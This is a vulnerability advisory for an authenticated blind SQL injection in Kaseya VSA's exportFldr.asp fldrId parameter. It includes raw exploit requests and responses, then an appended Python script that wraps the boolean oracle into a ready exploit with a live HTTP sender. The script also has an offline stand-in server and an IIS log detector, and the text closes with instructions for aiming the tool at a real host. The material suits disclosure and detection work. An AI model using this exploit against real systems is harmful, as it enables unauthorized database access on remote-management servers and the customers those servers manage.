
CVE-2021-30117 - Authenticated SQL injection in Kaseya VSA < v9.5.6

CVE CVE-2021-30117
Case DIVD-2021-00011
Discovered by
Credits
Products Kaseya:
  • Kaseya VSA (on premise and SaaS)
  • Kaseya VSA Agent
Versions Kaseya:
  • Kaseya VSA (on premise and SaaS)
    • 9.x (< 9.5.6)
  • Kaseya VSA Agent
    • 9.x (< 9.5.0.23)
CVSS Base score: 9.8
References
Solution
  • SaaS: fixed by the vendor
  • On premise:
    • Upgrade the server to version 9.5.6 or above
    • Upgrade the agent to version 9.5.0.23 or above
Last modified 20 Jun 2022 09:35

Description

The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId.

Detailed description

Given the following request:

GET /InstallTab/exportFldr.asp?fldrId=1' HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861;  agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;

Here the sessionId cookie value has been obtained via CVE-2021-30116. The unbalanced single quote breaks the SQL statement, so the request fails with a 500 error.

Response:

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 19:12:11 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 881
 
<!DOCTYPE html>
<HTML>
 
<HEAD>
 	<title>Whoops.</title>
        <meta http-equiv="X-UA-Compatible" content="IE=Edge" />
 
 
	<link id="favIcon" rel="shortcut icon" href="/themes/default/images/favicon.ico?307447361"></link>
 
----SNIP----

However, when fldrId is set to '(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))' the request is allowed: the CASE expression evaluates to 1 while the condition holds, whereas a false condition runs the ELSE branch, whose subquery returns two rows where a single value is expected and makes the statement fail. The difference between the 200 and the 500 response is the boolean oracle, and any condition can be substituted for 1=1.

Request:

GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1
Host: 192.168.1.194
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861;  agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;

Response:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=Utf-8
Date: Thu, 01 Apr 2021 17:33:53 GMT
Strict-Transport-Security: max-age=63072000; includeSubDomains
Connection: close
Content-Length: 7960
 
 
<html>
<head>
<title>Export Folder</title>
<style>
------ SNIP ----- 
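The two requests above form a true/false oracle: the same query renders the export page when the injected condition is true and errors when it is false. The following Python is an added example and is not DIVD's advisory code or Kaseya's; it packages the oracle into a payload builder, a status-code classifier and a stdlib sender, adds a constructed stand-in for the endpoint so it runs offline, and ends with a check over constructed IIS W3C log lines for the same request shape. The base URL, cookie string, regular expression and log lines are placeholders; the session cookie is assumed to be an already valid one (the advisory obtains it via CVE-2021-30116), and the script does not obtain it.

```python
"""Boolean-based blind SQLi oracle for the fldrId parameter, plus a log check.

Added example, not DIVD's or Kaseya's code. Host, cookie, the stand-in
server and the log lines are constructed placeholders.
"""
import re
import urllib.parse
import urllib.request
from urllib.error import HTTPError

ENDPOINT = "/InstallTab/exportFldr.asp"


def build_query(condition: str) -> str:
    """Wrap a SQL boolean in the CASE expression shown in the advisory.

    True condition  -> CASE yields 1, page renders, HTTP 200.
    False condition -> ELSE runs a two-row subquery in a scalar
                       position, statement fails, HTTP 500.
    """
    payload = (f"(SELECT (CASE WHEN {condition} THEN 1 "
               f"ELSE (SELECT 1 UNION SELECT 2) END))")
    return "fldrId=" + urllib.parse.quote(payload, safe="")


def classify(status: int):
    """Map an HTTP status to the oracle's truth value (None = no signal)."""
    if status == 200:
        return True
    if status == 500:
        return False
    return None


def make_http_sender(base_url: str, cookie: str):
    """Return send(query) -> status. `cookie` is the assumed, already valid
    session cookie string (sessionId etc.); nothing here obtains it."""
    def send(query: str) -> int:
        req = urllib.request.Request(f"{base_url}{ENDPOINT}?{query}",
                                     headers={"Cookie": cookie})
        try:
            with urllib.request.urlopen(req, timeout=15) as resp:
                return resp.status
        except HTTPError as err:        # urlopen raises on 4xx/5xx
            return err.code
    return send


def ask(send, condition: str):
    """Evaluate one SQL boolean through the oracle."""
    return classify(send(build_query(condition)))


# Constructed stand-in for the vulnerable endpoint (offline only). It mimics
# the observed behaviour: integer fldrId -> 200, the CASE payload -> 200/500
# depending on its comparison, anything else (e.g. 1') breaks the query -> 500.
_CASE_RE = re.compile(r"^\(SELECT \(CASE WHEN \((\d+)=(\d+)\) THEN 1 "
                      r"ELSE \(SELECT 1 UNION SELECT 2\) END\)\)$")


def fake_vsa(query: str) -> int:
    fldr = urllib.parse.parse_qs(query).get("fldrId", [""])[0]
    if fldr.isdigit():
        return 200
    m = _CASE_RE.match(fldr)
    if m and m.group(1) == m.group(2):
        return 200
    return 500


# Detection side: flag hits on the endpoint whose fldrId is not a plain integer.
IIS_FIELDS = ["date", "time", "s-ip", "cs-method", "cs-uri-stem", "cs-uri-query",
              "s-port", "cs-username", "c-ip", "cs(User-Agent)", "cs(Referer)",
              "sc-status", "sc-substatus", "sc-win32-status", "time-taken"]

# Constructed W3C-format log lines (not real traffic).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-04-01 19:12:11 10.0.0.5 GET /InstallTab/exportFldr.asp fldrId=1%27 443 - 203.0.113.7 Mozilla/5.0 - 500 0 0 31
2021-04-01 17:33:53 10.0.0.5 GET /InstallTab/exportFldr.asp fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 443 - 203.0.113.7 Mozilla/5.0 - 200 0 0 47
2021-04-01 17:40:02 10.0.0.5 GET /InstallTab/exportFldr.asp fldrId=42 443 admin 10.0.0.9 Mozilla/5.0 - 200 0 0 20
""".splitlines()


def suspicious_requests(log_lines):
    """Return (client ip, decoded fldrId, status) for non-integer fldrId values.
    A 500/200 alternation from one client is the oracle being driven."""
    hits = []
    for line in log_lines:
        if line.startswith("#") or not line.strip():
            continue
        parts = line.split(" ")
        if len(parts) != len(IIS_FIELDS):
            continue
        rec = dict(zip(IIS_FIELDS, parts))
        if rec["cs-uri-stem"].lower() != ENDPOINT.lower():
            continue
        fldr = urllib.parse.parse_qs(rec["cs-uri-query"]).get("fldrId", [""])[0]
        if not fldr.isdigit():
            hits.append((rec["c-ip"], fldr, int(rec["sc-status"])))
    return hits


if __name__ == "__main__":
    print("1=1 ->", ask(fake_vsa, "(1=1)"), " 1=2 ->", ask(fake_vsa, "(1=2)"))
    for hit in suspicious_requests(SAMPLE_LOG):
        print("suspicious:", hit)
```

To run it against a real host, swap `fake_vsa` for `make_http_sender("https://vsa.example", "sessionId=...; ...")` with a valid session cookie; `build_query("(1=1)")` reproduces the exact encoded query string of the second request above.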
